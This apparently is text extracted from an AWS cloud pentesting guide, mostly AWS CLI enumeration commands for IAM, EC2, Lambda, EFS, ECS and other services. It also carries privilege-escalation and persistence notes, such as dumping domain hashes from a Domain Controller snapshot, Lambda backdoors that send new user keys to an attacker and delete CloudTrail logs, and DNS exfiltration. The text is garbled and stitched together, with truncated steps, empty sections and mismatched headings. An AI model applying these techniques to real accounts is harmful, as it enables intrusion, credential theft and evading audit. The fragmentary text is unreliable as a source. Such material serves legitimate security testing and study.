# Repos
aws codecommit list-repositories
aws codecommit get-repository --repository-name <name>
aws codecommit get-repository-triggers --repository-name <name>
aws codecommit list-branches --repository-name <name>
aws codecommit list-pull-requests --repository-name <name>
# Approval rules
aws codecommit list-approval-rule-templates
aws codecommit get-approval-rule-template --approval-rule-
template-name <name>
aws codecommit list-associated-approval-rule-templates-for-
repository --repository-name <name>
Options
Directory Services allows to create 5 types of directories:
Lab
Here you can find a nice tutorial to create you own Microsoft AD in AWS:
https://docs.aws.amazon.com/directoryservice/latest/admin-
guide/ms_ad_tutorial_test_lab_base.html
Enumeration
# Get directories and DCs
aws ds describe-directories
aws ds describe-domain-controllers --directory-id <id>
# Get directory settings
aws ds describe-trusts
aws ds describe-ldaps-settings --directory-id <id>
aws ds describe-shared-directories --owner-directory-id <id>
aws ds get-directory-limits
aws ds list-certificates --directory-id <id>
aws ds describe-certificate --directory-id <id> --certificate-
id <id>
Login
Note that if the description of the directory contained a domain in the field
AccessUrl it's because a user can probably login with its AD credentials
in some AWS services:
Privilege Escalation
aws-directory-services-privesc.md
Persistence
Using an AD user
An AD user can be given access over the AWS management console via
a Role to assume. The default username is Admin and it's possible to
change its password from AWS console.
Enumeration
{ % code overflow="wrap" %}
# Get AD users (Admin not included)
aws workdocs describe-users --organization-id <directory-id>
# Get AD groups (containing "a")
aws workdocs describe-groups --organization-id d-9067a0285c --
search-query a
Unlike S3 access logs and CloudFront access logs, the log data generated
by VPC Flow Logs is not stored in S3. Instead, the log data captured is
sent to CloudWatch logs.
Limitations:
If you are running a VPC peered connection, then you'll only be able
to see flow logs of peered VPCs that are within the same account.
If you are still running resources within the EC2-Classic environment,
then unfortunately you are not able to retrieve information from their
interfaces
Once a VPC Flow Log has been created, it cannot be changed. To alter
the VPC Flow Log configuration, you need to delete it and then
recreate a new one.
The following traffic is not monitored and captured by the logs. DHCP
traffic within the VPC, traffic from instances destined for the Amazon
DNS Server.
Any traffic destined to the IP address for the VPC default router and
traffic to and from the following addresses, 169.254.169.254 which is
used for gathering instance metadata, and 169.254.169.123 which is
used for the Amazon Time Sync Service.
Traffic relating to an Amazon Windows activation license from a
Windows instance
Traffic between a network load balancer interface and an endpoint
network interface
For every network interface that publishes data to the CloudWatch log
group, it will use a different log stream. And within each of these streams,
there will be the flow log event data that shows the content of the log
entries. Each of these logs captures data during a window of
approximately 10 to 15 minutes.
Subnets
Subnets helps to enforce a greater level of security. Logical grouping of
similar resources also helps you to maintain an ease of management
across your infrastructure.\ Valid CIDR are from a /16 netmask to a /28
netmask.\ A subnet cannot be in different availability zones at the same
time.
By having multiple Subnets with similar resources grouped together, it
allows for greater security management. By implementing network level
virtual firewalls, called network access control lists, or NACLs, it's
possible to filter traffic on specific ports from both an ingress and egress
point at the Subnet level.
When you create a subnet the network and broadcast address of the
subnet can't be used for host addresses and AWS reserves the first three
host IP addresses of each subnet for internal AWS usage: he first host
address used is for the VPC router. The second address is reserved for AWS
DNS and the third address is reserved for future use.
It's called public subnets to those that have direct access to the Internet,
whereas private subnets do not.
In order to make a subnet public you need to create and attach an Internet
gateway to your VPC. This Internet gateway is a managed service,
controlled, configured, and maintained by AWS. It scales horizontally
automatically, and is classified as a highly valuable component of your
VPC infrastructure. Once your Internet gateway is attached to your VPC,
you have a gateway to the Internet. However, at this point, your instances
have no idea how to get out to the Internet. As a result, you need to add a
default route to the route table associated with your subnet. The route could
have a destination value of 0.0. 0. 0/0, and the target value will be set as
your Internet gateway ID.
If you are connection a subnet with a different subnet you cannot access
the subnets connected with the other subnet, you need to create connection
with them directly. This also applies to internet gateways. You cannot go
through a subnet connection to access internet, you need to assign the
internet gateway to your subnet.
VPC Peering
VPC peering allows you to connect two or more VPCs together, using
IPV4 or IPV6, as if they were a part of the same network.
Relation
Learn how are related the most common elements of networking of AWS:
>VPC, network, subnetworks, interfaces, security groups, NAT gateways...
in
aws-vpcs-network-subnetworks-ifaces-secgroups-nat.md
Enumeration
Check the enumeration of the EC2 section below.
Post- Exploitation
aws-malicious-vpc-mirror.md
EC2
You can use Amazon EC2 to launch as many or as few virtual servers as
you need, configure security and networking, and manage storage.
Amazon EC2 enables you to scale up or down to handle changes in
requirements or spikes in popularity, reducing your need to forecast traffic.
Virtual Machines
SSH Keys
User Data
Snapshots
Networking
Networks
Subnetworks
Public IPs
Open ports
Integrated connections with other networks outside AWS
Instance Profiles
Using roles to grant permissions to applications that run on EC2 instances
requires a bit of extra configuration. An application running on an EC2
instance is abstracted from AWS by the virtualized operating system.
Because of this extra separation, you need an additional step to assign an
AWS role and its associated permissions to an EC2 instance and make them
available to its applications. This extra step is the creation of an instance
profile attached to the instance. The instance profile contains the role and
can provide the role's temporary credentials to an application that runs on
the instance. Those temporary credentials can then be used in the
application's API calls to access resources and to limit access to only those
resources that the role specifies. Note that only one role can be assigned to
an EC2 instance at a time, and all applications on the instance share the
same role and permissions.
Enumeration
# Get EC2 instances
aws ec2 describe-instances
aws ec2 describe-instance-status #Get status from running
instances
# Instance profiles
aws iam list-instance-profiles
aws iam list-instance-profiles-for-role --role-name <name>
# Get tags
aws ec2 describe-tags
# Get volumes
aws ec2 describe-volume-status
aws ec2 describe-volumes
# Get snapshots
aws ec2 describe-snapshots --owner-ids self
# Scheduled instances
aws ec2 describe-scheduled-instances
# Get subnetworks
aws ec2 describe-subnets
# Get FW rules
aws ec2 describe-network-acls
# Get security groups
aws ec2 describe-security-groups
# Get interfaces
aws ec2 describe-network-interfaces
# Get VPCs
aws ec2 describe-vpcs
aws ec2 describe-vpc-peering-connections
Copy Instance
First you need to extract data about the current instances and their
AMI/security groups/subnet : aws ec2 describe-images --region eu-
west-1
# create a new image for the instance-id
$ aws ec2 create-image --instance-id i-0438b003d81cd7ec5 --name
"AWS Audit" --description "Export AMI" --region eu-west-1
# create ec2 using the previously created AMI, use the same
security group and subnet to connect easily.
$ aws ec2 run-instances --image-id ami-0b77e2d906b00202d --
security-group-ids "sg-6d0d7f01" --subnet-id subnet-9eb001ea --
count 1 --instance-type t2.micro --key-name "AWS Audit" --query
"Instances[0].InstanceId" --region eu-west-1
Privesc
In the following page you can check how to abuse EC2 permissions to
escalate privileges:
aws-ec2-privesc.md
Unauthenticated Access
aws-ec2-unauthenticated-enum.md
DNS Exfiltration
Even if you lock down an EC2 so no traffic can get out, it can still exfil via
DNS.
Network Persistence
If a defender finds that an EC2 instance was compromised he will
probably try to isolate the network of the machine. He could do this with
an explicit Deny NACL (but NACLs affect the entire subnet), or changing
the security group not allowing any kind of inbound or outbound traffic.
If the attacker had an SSH connection with the machine the change of the
security grup will kill this connection. However, if the attacker had a
reverse shell originated from the machine, even if no inboud or outbound
rule allows this connection, the connection won't be killed due to
Security Group Connection Tracking.
Mount it in a EC2 VM under your control (it has to be in the same region
as the copy of the backup):
step 1: Head over to EC2 –> Volumes and create a new volume of your
preferred size and type.
Step 2: Select the created volume, right click and select the “attach
volume�? option.
Step 3: Select the instance from the instance text box as shown below.\
Step 4: Now, login to your ec2 instance and list the available disks using
the following command.
lsblk
The above command will list the disk you attached to your instance.
Step5:
Shadow Copy
Any AWS user possessing the EC2:CreateSnapshot permission can steal
the hashes of all domain users by creating a snapshot of the Domain
Controller mounting it to an instance they control and exporting the
NTDS.dit and SYSTEM registry hive file for use with Impacket's
secretsdump project.
Privesc
In the following page you can check how to abuse EBS permissions to
escalate privileges:
aws-ebs-privesc.md
SSM
Amazon Simple Systems Manager (SSM) allows to remotely manage
floats of EC2 instances to make their administrations much more easy. Each
of these instances need to be running the SSM Agent service as the service
will be the one getting the actions and performing them from the AWS
API.
SSM Agent makes it possible for Systems Manager to update, manage, and
configure these resources. The agent processes requests from the Systems
Manager service in the AWS Cloud, and then runs them as specified in
the request.
Enumeration
Privesc
In the following page you can check how to abuse SSM permissions to
escalate privileges:
aws-ssm-privesc.md
Post-Exploitation
Techniques like SSM message interception can be found in the SSM post-
exploitation page:
aws-ssm-post-exploitation.md
ELB
Elastic Load Balancing (ELB) is a load-balancing service for Amazon
Web Services (AWS) deployments. ELB automatically distributes
incoming application traffic and scales resources to meet traffic demands.
Enumeration
# Launch templates
aws ec2 describe-launch-templates
aws ec2 describe-launch-template-versions --launch-template-id
<launch_template_id>
# Autoscaling
aws autoscaling describe-auto-scaling-groups
aws autoscaling describe-auto-scaling-instances
aws autoscaling describe-launch-configurations
aws autoscaling describe-load-balancer-target-groups
aws autoscaling describe-load-balancers
VPN
Site-to-Site VPN
Connect your on premisses network with your VPC.
Concepts
VPN connection: A secure connection between your on-premises
equipment and your VPCs.
VPN tunnel: An encrypted link where data can pass from the
customer network to or from AWS.
Each VPN connection includes two VPN tunnels which you can
simultaneously use for high availability.
Limitations
IPv6 traffic is not supported for VPN connections on a virtual private
gateway.
An AWS VPN connection does not support Path MTU Discovery.
In addition, take the following into consideration when you use Site-to-Site
VPN.
Concepts
Client VPN endpoint: The resource that you create and configure to
enable and manage client VPN sessions. It is the resource where all
client VPN sessions are terminated.
Target network: A target network is the network that you associate
with a Client VPN endpoint. A subnet from a VPC is a target
network. Associating a subnet with a Client VPN endpoint enables
you to establish VPN sessions. You can associate multiple subnets
with a Client VPN endpoint for high availability. All subnets must be
from the same VPC. Each subnet must belong to a different
Availability Zone.
Route: Each Client VPN endpoint has a route table that describes the
available destination network routes. Each route in the route table
specifies the path for traffic to specific resources or networks.
Authorization rules: An authorization rule restricts the users who
can access a network. For a specified network, you configure the
Active Directory or identity provider (IdP) group that is allowed
access. Only users belonging to this group can access the specified
network. By default, there are no authorization rules and you must
configure authorization rules to enable users to access resources and
networks.
Client: The end user connecting to the Client VPN endpoint to
establish a VPN session. End users need to download an OpenVPN
client and use the Client VPN configuration file that you created to
establish a VPN session.
Client CIDR range: An IP address range from which to assign client
IP addresses. Each connection to the Client VPN endpoint is assigned
a unique IP address from the client CIDR range. You choose the client
CIDR range, for example, 10.2.0.0/16 .
Client VPN ports: AWS Client VPN supports ports 443 and 1194 for
both TCP and UDP. The default is port 443.
Client VPN network interfaces: When you associate a subnet with
your Client VPN endpoint, we create Client VPN network interfaces in
that subnet. Traffic that's sent to the VPC from the Client VPN
endpoint is sent through a Client VPN network interface. Source
network address translation (SNAT) is then applied, where the source
IP address from the client CIDR range is translated to the Client VPN
network interface IP address.
Connection logging: You can enable connection logging for your
Client VPN endpoint to log connection events. You can use this
information to run forensics, analyze how your Client VPN endpoint is
being used, or debug connection issues.
Self-service portal: You can enable a self-service portal for your
Client VPN endpoint. Clients can log into the web-based portal using
their credentials and download the latest version of the Client VPN
endpoint configuration file, or the latest version of the AWS provided
client.
Limitations
Client CIDR ranges cannot overlap with the local CIDR of the
VPC in which the associated subnet is located, or any routes manually
added to the Client VPN endpoint's route table.
Client CIDR ranges must have a block size of at least /22 and must
not be greater than /12.
A portion of the addresses in the client CIDR range are used to
support the availability model of the Client VPN endpoint, and
cannot be assigned to clients. Therefore, we recommend that you
assign a CIDR block that contains twice the number of IP
addresses that are required to enable the maximum number of
concurrent connections that you plan to support on the Client VPN
endpoint.
The client CIDR range cannot be changed after you create the Client
VPN endpoint.
The subnets associated with a Client VPN endpoint must be in the
same VPC.
You cannot associate multiple subnets from the same Availability
Zone with a Client VPN endpoint.
A Client VPN endpoint does not support subnet associations in a
dedicated tenancy VPC.
Client VPN supports IPv4 traffic only.
Client VPN is not Federal Information Processing Standards (FIPS)
compliant.
If multi-factor authentication (MFA) is disabled for your Active
Directory, a user password cannot be in the following format.
SCRV1:<base64_encoded_string>:<base64_encoded_string>
Enumeration
Check EC2 enumeration.
A VPC contains a network CIDR like 10.0.0.0/16 (with its routing table
and network ACL).
Therefore, a security group will limit the exposed ports of the network
interfaces using it, independently of the subnetwork. And a network
ACL will limit the exposed ports to to the whole network.
The attacker could also send any response he likes to the messages.
Shortly after the SSM Agent starts up, it will create a WebSocket
connection back to AWS. This connection is the control channel, and is
responsible for listening for connections. When a user tries to start an SSM
session (ssm:StartSession), the control channel will receive the request
and will spawn a data channel. The data channel is responsible for the
actual communication from the user to the EC2 instance.
The communication that takes place between the clients is a binary protocol
specifically for this purpose. Thankfully, the source code for the SSM
Agent is available here, and we can just look up the specification for it. It
looks something like this.
In the next few sections, we’ll cover how malmirror works, what it does,
and how to analyze the exfiltrated data. The script itself can be found on our
GitHub here.
How malmirror Works
malmirror deploys the following resources into an account:
ECS operates using the following three building blocks: Clusters, Services,
and Task Definitions.
Enumeration
# Clusters info
aws ecs list-clusters
aws ecs describe-clusters --clusters <cluster>
# Container instances
## An Amazon ECS container instance is an Amazon EC2 instance
that is running the Amazon ECS container agent and has been
registered into an Amazon ECS cluster.
aws ecs list-container-instances
aws ecs describe-container-instances
# Services info
aws ecs list-services --cluster <cluster>
aws ecs describe-services --cluster <cluster> --services
<services>
aws ecs describe-task-sets --cluster <cluster> --service
<service>
# Task definitions
aws ecs list-task-definition-families
aws ecs list-task-definitions
aws ecs list-tasks --cluster <cluster>
aws ecs describe-tasks --cluster <cluster> --tasks <tasks>
## Look for env vars and secrets used from the task definition
aws ecs describe-task-definition --task-definition <TASK_NAME>:
<VERSION>
Privesc
In the following page you can check how to abuse ECS permissions to
escalate privileges:
aws-ecs-privesc.md
ECR
Amazon Elastic Container Registry (Amazon ECR) is a managed
container image registry service. Customers can use the familiar Docker
CLI, or their preferred client, to push, pull, and manage images.
Public repositories:
Enumeration
aws ecr describe-repositories
aws ecr describe-registry
aws ecr list-images --repository-name <repo_name>
aws ecr describe-images --repository-name <repo_name>
aws ecr describe-image-replication-status --repository-name
<repo_name> --image-id <image_id>
aws ecr describe-image-scan-findings --repository-name
<repo_name> --image-id <image_id>
aws ecr describe-pull-through-cache-rules --repository-name
<repo_name> --image-id <image_id>
# Download
docker pull <UserID>.dkr.ecr.us-east-
1.amazonaws.com/<ECRName>:latest
docker inspect
sha256:079aee8a89950717cdccd15b8f17c80e9bc4421a855fcdc120e1c534
e4c102e0
After downloading the images you should check them for sensitive info:
https://book.hacktricks.xyz/generic-methodologies-and-resources/basic-
forensic-methodology/docker-forensics
Privesc
In the following page you can check how to abuse ECR permissions to
escalate privileges:
aws-ecr-privesc.md
EKS
Amazon Elastic Kubernetes Service (Amazon EKS) is a managed service
that you can use to run Kubernetes on AWS without needing to install,
operate, and maintain your own Kubernetes control plane or nodes.
Enumeration
# Generate kubeconfig
aws eks update-kubeconfig --name aws-eks-dev
From AWS to Kubernetes
The creator of the EKS cluster is ALWAYS going to be able to get into
the kubernetes cluster part of the group system:masters (k8s admin). At
the time of this writing there is no direct way to find who created the
cluster (you can check CloudTrail). And the is no way to remove that
privilege.
The way to grant access to over K8s to more AWS IAM users or roles is
using the configmap aws-auth .
Therefore, anyone with write access over the config map aws-auth will
be able to compromise the whole cluster.
For more information about how to grant extra privileges to IAM roles &
users in the same or different account and how to abuse this to privesc
check this page.
Check also this awesome post to learn how the authentication IAM ->
Kubernetes work.
aws-ec2-ebs-elb-ssm-vpc-and-vpn-enum
Security
When creating an App in Beanstalk there are 3 very important security
options to choose:
EC2 key pair: This will be the SSH key that will be able to access the
EC2 instances running the app
IAM instance profile: This is the instance profile that the instances
will have (IAM privileges)
The autogenerated role will have some interesting access over all
ECS, all SQS, DynamoDB elasticbeanstalk and elasticbeanstalk
S3
Service role: This is the role that the AWS service will use to
perform all the needed actions. Afaik, a regular AWS user cannot
access that role.
Exposure
Beanstalk data is stored in a S3 bucket with the following name:
elasticbeanstalk-<region>-<acc-id> (if it was created in the AWS
console). Inside this bucket you will find the uploaded source code of the
application.
Enumeration
{ % code overflow="wrap" %}
# Find S3 bucket
for r in "us-east-1 us-east-2 us-west-1 us-west-2 ap-south-1
ap-south-2 ap-northeast-1 ap-northeast-2 ap-northeast-3 ap-
southeast-1 ap-southeast-2 ap-southeast-3 ca-central-1 eu-
central-1 eu-central-2 eu-west-1 eu-west-2 eu-west-3 eu-north-1
sa-east-1 af-south-1 ap-east-1 eu-south-1 eu-south-2 me-south-1
me-central-1"; do aws s3 ls elasticbeanstalk-$r-
<account_number> 2>/dev/null; done
# Get events
aws elasticbeanstalk describe-events
Privesc
aws-elastic-beanstalk-privesc.md
From EMR version 4.8.0 and onwards, we have the ability to create a
security configuration specifying different settings on how to manage
encryption for your data within your clusters. You can either encrypt
your data at rest, data in transit, or if required, both together. The great thing
about these security configurations is they're not actually a part of your EC2
clusters.
One key point of EMR is that by default, the instances within a cluster do
not encrypt data at rest. Once enabled, the following features are
available.
Once the TLS certificate provider has been configured in the security
configuration file, the following encryption applications specific encryption
features can be enabled which will vary depending on your EMR version.
Hadoop might reduce encrypted shuffle which uses TLS. Both secure
Hadoop RPC which uses Simple Authentication Security Layer, and
data encryption of HDFS Block Transfer which uses AES-256, are
both activated when at rest encryption is enabled in the security
configuration.
Presto: When using EMR version 5.6.0 and later, any internal
communication between Presto nodes will use SSL and TLS.
Tez Shuffle Handler uses TLS.
Spark: The Akka protocol uses TLS. Block Transfer Service uses
Simple Authentication Security Layer and 3DES. External shuffle
service uses the Simple Authentication Security Layer.
Enumeration
aws emr list-clusters
aws emr describe-cluster --cluster-id <id>
aws emr list-instances --cluster-id <id>
aws emr list-instance-fleets --cluster-id <id>
aws emr list-steps --cluster-id <id>
aws emr list-notebook-executions
aws emr list-security-configurations
aws emr list-studios #Get studio URLs
Privesc
aws-emr-privesc.md
Network Access
These file systems will be accessible from specific networks, so you will
need some access inside the network to access to the NFS service.\
Moreover, the EFS should have in the subnetwork endpoint that you can
access a security group allowing access to NFS (2049 port). Without this,
you won't be able to contact the NFS service (this isn't create by default).\
For more information about how to do this check:
https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-
at-mount
IAM Access
By default anyone with network access to the EFS will be able to mount,
read and write it even as root user. However, File System policies could
be in place only allowing principals with specific permissions to access
it.\ For example, this File System policy won't allow even to mount the
file system if you don't have the IAM permission:
{
"Version": "2012-10-17",
"Id": "efs-policy-wizard-2ca2ba76-5d83-40be-8557-
8f6c19eaa797",
"Statement": [
{
"Sid": "efs-statement-e7f4b04c-ad75-4a7f-a316-
4e5d12f0dbf5",
"Effect": "Allow",
"Principal": {
"AWS": "*"
},
"Action": "",
"Resource": "arn:aws:elasticfilesystem:us-east-
1:318142138553:file-system/fs-0ab66ad201b58a018",
"Condition": {
"Bool": {
"elasticfilesystem:AccessedViaMountTarget":
"true"
}
}
}
]
}
Note that to mount file systems protected by IAM you MUST use the type
"efs" in the mount command:
sudo mkdir /efs
sudo mount -t efs -o tls,iam <file-system-id/EFS DNS name>:/
/efs/
# To use a different pforile from ~/.aws/credentials
# You can use: -o tls,iam,awsprofile=namedprofile
Access Points
Access points are application-specific entry points into an EFS file
system that make it easier to manage application access to shared datasets.\
They can enforce user identity, including the user’s POSIX groups,
different root directory and different IAM policies.
You can mount the File System from an access point with something
like:
Note that even trying to mount an access point you still need to be able to
contact the NFS service via network, and if the EFS has a file system
policy, you need enough IAM permissions to mount it.
Enumeration
# Get filesystems and access policies (if any)
aws efs describe-file-systems
aws efs describe-file-system-policy --file-system-id <id>
# Get subnetworks and IP addresses where you can find the file
system
aws efs describe-mount-targets --file-system-id <id>
aws efs describe-mount-target-security-groups --mount-target-id
<id>
## Mount found
sudo apt install nfs-common
sudo mount -t nfs4 -o
nfsvers=4.1,rsize=1048576,wsize=1048576,hard,timeo=600,retrans=
2,noresvport <IP>:/ /efs
Privesc
aws-efs-privesc.md
Enumeration
aws-basic-information
Enumeration
Main permissions needed:
iam:ListRoles
iam:ListUsers
iam:ListGroups
iam:ListGroupsForUser
iam:ListAttachedUserPolicies
iam:ListAttachedRolePolicies
iam:ListAttachedGroupPolicies
# List users
aws iam list-users
aws iam list-ssh-public-keys #User keys for CodeCommit
aws iam get-ssh-public-key --user-name <username> --ssh-public-
key-id <id> --encoding SSH #Get public key with metadata
aws iam list-service-specific-credentials #Get special
permissions of the IAM user over specific services
aws iam get-user --user-name <username> #Get metadata of user
aws iam list-access-keys #List created access keys
## inline policies
aws iam list-user-policies --user-name <username> #Get inline
policies of the user
aws iam get-user-policy --user-name <username> --policy-name
<policyname> #Get inline policy details
## attached policies
aws iam list-attached-user-policies --user-name <username> #Get
policies of user, it doesn't get inline policies
# List groups
aws iam list-groups #Get groups
aws iam list-groups-for-user --user-name <username> #Get groups
of a user
aws iam get-group --group-name <name> #Get group name info
## inline policies
aws iam list-group-policies --group-name <username> #Get inline
policies of the group
aws iam get-group-policy --group-name <username> --policy-name
<policyname> #Get an inline policy info
## attached policies
aws iam list-attached-group-policies --group-name <name> #Get
policies of group, it doesn't get inline policies
# List roles
aws iam list-roles #Get roles
aws iam get-role --role-name <role-name> #Get role
## inline policies
aws iam list-role-policies --role-name <name> #Get inline
policies of a role
aws iam get-role-policy --role-name <name> --policy-name <name>
#Get inline policy details
aws iam list-attached-role-policies --role-name <role-name>
#Get policies of role, it doesn't get inline policies
# List policies
aws iam list-policies [--only-attached] [--scope Local]
aws iam list-policies-granting-service-access --arn <identity>
--service-namespaces <svc> # Get list of policies that give
access to the user to the service
## Get policy content
aws iam get-policy --policy-arn <policy_arn>
aws iam list-policy-versions --policy-arn <arn>
aws iam get-policy-version --policy-arn
<arn:aws:iam::975426262029:policy/list_apigateways> --version-
id <VERSION_X>
# Enumerate providers
aws iam list-saml-providers
aws iam get-saml-provider --saml-provider-arn <ARN>
aws iam list-open-id-connect-providers
aws iam get-open-id-connect-provider --open-id-connect-
provider-arn <ARN>
# Misc
aws iam get-account-password-policy
aws iam list-mfa-devices
aws iam list-virtual-mfa-devices
If you are interested in your own permissions but you don't have access to
query IAM you could always brute-force them using
https://github.com/andresriancho/enumerate-iam (don't forget to update
the API file as indicated in the instructions).
You could also use the tool weirdAAL which will indicate in the output the
actions you can perform in the most common AWS services.
# Install
git clone https://github.com/carnal0wnage/weirdAAL.git
cd weirdAAL
python3 -m venv weirdAAL
source weirdAAL/bin/activate
pip3 install -r requirements.txt
# Invoke it
python3 weirdAAL.py -m recon_all -t MyTarget
# You will see output such as:
# [+] elbv2 Actions allowed are [+]
# ['DescribeLoadBalancers', 'DescribeAccountLimits',
'DescribeTargetGroups']
Privesc
In the following page you can check how to abuse IAM permissions to
escalate privileges:
aws-iam-privesc.md
{
"Version": "2012-10-17",
"Statement": [
{
"Effect": "Allow",
"Principal": {
"AWS": [
"*",
"arn:aws:iam::123213123123:root"
]
},
"Action": "sts:AssumeRole"
}
]
}
STS
AWS provides AWS Security Token Service (AWS STS) as a web service
that enables you to request temporary, limited-privilege credentials for
AWS Identity and Access Management (IAM) users or for users you
authenticate (federated users).
Enumeration
Privesc
In the following page you can check how to abuse STS permissions to
escalate privileges:
aws-sts-privesc.md
Persistence
Assume role token
Temporary tokens cannot be listed, so maintaining an active temporary
token is a way to maintain persistence.
# With MFA
aws sts get-session-token \
--serial-number <mfa-device-name> \
--token-code <code-from-token>
optional arguments:
-h, --help show this help message and exit
-r ROLE_LIST [ROLE_LIST ...], --role-list ROLE_LIST
[ROLE_LIST ...]
Post-Exploitation
cd /tmp
python3 -m venv env
source ./env/bin/activate
pip install aws-consoler
aws_consoler [params...] #This will generate a link to login
into the console
aws-vault
aws-vault is a tool to securely store and access AWS credentials in a
development environment.
aws-vault list
aws-vault exec jonsmith -- aws s3 ls # Execute aws cli with
jonsmith creds
aws-vault login jonsmith # Open a browser logged as jonsmith
Wildcard as principal
{
"Action": "sts:AssumeRole",
"Effect": "Allow",
"Principal": { "AWS": "*" },
}
Service as principal
{
"Action": "lambda:InvokeFunction",
"Effect": "Allow",
"Principal": { "Service": "apigateway.amazonaws.com" },
"Resource": "arn:aws:lambda:000000000000:function:foo"
}
This policy allows any account to configure their apigateway to call this
Lambda.
S3 as principal
"Condition": {
"ArnLike": { "aws:SourceArn": "arn:aws:s3:::source-bucket" },
"StringEquals": {
"aws:SourceAccount": "123456789012"
}
}
Not supported
{
"Effect": "Allow",
"Principal": {"Service": "cloudtrail.amazonaws.com"},
"Action": "s3:PutObject",
"Resource":
"arn:aws:s3:::myBucketName/AWSLogs/MY_ACCOUNT_ID/*"
}
Customer Master Keys (CMK): Can encrypt data up to 4KB in size. They
are typically used to create, encrypt, and decrypt the DEKs (Data
Encryption Keys). Then the DEKs are used to encrypt the data.
Key Policies
These defines who can use and access a key in KMS.
By default:
It gives the AWS account that owns the KMS key full access to the
KMS key.
Unlike other AWS resource policies, a AWS KMS key policy does
not automatically give permission to the account or any of its
users. To give permission to account administrators, the key policy
must include an explicit statement that provides this permission, like
this one.
Without this permission, IAM policies that allow access to the key
are ineffective, although IAM policies that deny access to the key are
still effective.
{
"Sid": "Enable IAM policies",
"Effect": "Allow",
"Principal": {
"AWS": "arn:aws:iam::111122223333:root"
},
"Action": "kms:*",
"Resource": "*"
}
If the account is allowed ( "arn:aws:iam::111122223333:root" )a
principal from the account will still need IAM permissions to use the
KMS key. However, if the ARN of a role for example is specifically
allowed in the Key Policy, that role doesn't need IAM permissions.
Policy Details
Properties of a policy:
Grants:
Access:
Via key policy -- If this exist, this takes precedent over the IAM
policy
Via IAM policy
Via grants
Key Administrators
Key administrator by default:
Rotation of CMKs
The longer the same key is left in place, the more data is encrypted
with that key, and if that key is breached, then the wider the blast area
of data is at risk. In addition to this, the longer the key is active, the
probability of it being breached increases.
KMS rotate customer keys every 365 days (or you can perform the
process manually whenever you want) and keys managed by AWS
every 3 years and this time it cannot be changed.
Older keys are retained to decrypt data that was encrypted prior to
the rotation
In a break, rotating the key won't remove the threat as it will be
possible to decrypt all the data encrypted with the compromised key.
However, the new data will be encrypted with the new key.
If CMK is in state of disabled or pending deletion, KMS will not
perform a key rotation until the CMK is re-enabled or deletion is
cancelled.
Manual rotation
A new CMK needs to be created, then, a new CMK-ID is created, so
you will need to update any application to reference the new CMK-
ID.
To do this process easier you can use aliases to refer to a key-id and
then just update the key the alias is referring to.
You need to keep old keys to decrypt old files encrypted with it.
KMS has full audit and compliance integration with CloudTrail; this is
where you can audit all changes performed on KMS.
Limit who can create data keys and which services have access to use
these keys
Limit systems access to encrypt only, decrypt only or both
Define to enable systems to access keys across regions (although it is
not recommended as a failure in the region hosting KMS will affect
availability of systems in other regions).
You cannot synchronize or move/copy keys across regions; you can only
define rules to allow access across region.
Enumeration
Privesc
aws-kms-privesc.md
Persistence
It's possible to grant access to keys to external accounts via KMS key
policies. Check the KMS Privesc page for more information.
References
https://docs.aws.amazon.com/kms/latest/developerguide/key-policy-
default.html
Enumeration
aws lambda get-account-settings
# List layers
aws lambda list-layers
aws lambda list-layer-versions --layer-name <name>
aws lambda get-layer-version --layer-name <name> --version-
number <ver>
# Invoke function
aws lambda invoke --function-name FUNCTION_NAME /tmp/out
## Some functions will expect parameters, they will access them
with something like:
## target_policys = event['policy_names']
## user_name = event['user_name']
aws lambda invoke --function-name <name> --cli-binary-format
raw-in-base64-out --payload '{"policy_names":
["AdministratorAccess], "user_name": "sdf"}' out.txt
Now, that you know the name and the ID you can get the Name:
URL:`` `` https://<rest-api-id>.execute-api.
<region>.amazonaws.com/<stageName>/<funcName>
Aliases Weights
A Lambda can have several versions.\ And it can have more than 1
version exposed via aliases. The weights of each of the versions exposed
inside and alias will decide which alias receive the invocation (it can be
90%-10% for example).\ If the code of one of the aliases is vulnerable you
can send requests until the vulnerable versions receives the exploit.
Privesc
In the following page you can check how to abuse Lambda permissions to
escalate privileges:
aws-lambda-privesc
Unauthenticated Access
aws-lambda-unauthenticated-access.md
Persistence/Avoid Detection
API Gateway Lambda Proxy integration
It's possible to make an PAI gateway call lambda with a custom execution
role that the lambda will use in its execution. You could assing here a
privileged execution role and execute a controlled lambda endpoint with it:
Resource-based policy
It's possible to add a resource policy to a lambda that will allow
principals even from external accounts to call the function.
i. Note the final :1 of the arn indicating the version of the function
5. Select the POST method created and in Actions select Deploy API
6. Now, when you call the function via POST your Backdoor will be
invoked
Cron/Event actuator
The fact that you can make lambda functions run when something
happen or when some time pass makes lambda a nice and common way to
obtain persistence and avoid detection.\ Here you have some ideas to make
your presence in AWS more stealth by creating lambdas.
Every time a new user is created lambda generates a new user key and
send it to the attacker.
Every time a new role is created lambda gives assume role permissions
to compromised users.
Every time new cloudtrail logs are generated, delete/alter them
Support HackTricks and get benefits!
AWS - Lightsail Enum
Support HackTricks and get benefits!
AWS - Lightsail
Amazon Lightsail provides an easy, lightweight way for new cloud users to
take advantage of AWS’ cloud computing services. It allows you to deploy
common and custom web services in seconds via VMs (EC2) and
containers.
Enumeration
# Instances
aws lightsail get-instances #Get all
aws lightsail get-instance-port-states --instance-name
<instance_name> #Get open ports
# Databases
aws lightsail get-relational-databases
aws lightsail get-relational-database-snapshots
aws lightsail get-relational-database-parameters
# More
aws lightsail get-load-balancers
aws lightsail get-static-ips
aws lightsail get-key-pairs
Analyse Snapshots
It's possible to generate instance and relational database snapshots from
lightsail. Therefore you can check those the same way you can check EC2
snapshots and RDS snapshots.
Metadata
Metadata endpoint is accessible from lightsail, but the machines are
running in an AWS account managed by AWS so you don't control what
permissions are being granted. However, if you find a way to exploit
those you would be directly exploiting AWS.
Privesc
In the following page you can check how to abuse codebuild permissions
to escalate privileges:
aws-lightsail-privesc.md
AWS - RabbitMQ
RabbitMQ is a message-queueing software also known as a message
broker or queue manager. Simply said; it is software where queues are
defined, to which applications connect in order to transfer a message or
messages.
A message can include any kind of information. It could, for example, have
information about a process or task that should start on another application
(which could even be on another server), or it could be just a simple text
message. The queue-manager software stores the messages until a receiving
application connects and takes a message off the queue. The receiving
application then processes the message.
Types
There are 2 types of Kafka clusters that AWS allows to create: Provisioned
and Serverless.
Enumeration
#Get clusters
aws kafka list-clusters
aws kafka list-clusters-v2
# Read messages
kafka_2.12-2.8.1/bin/kafka-console-consumer.sh --bootstrap-
server $BS --consumer.config client.properties --topic msk-
serverless-tutorial --from-beginning
Privesc
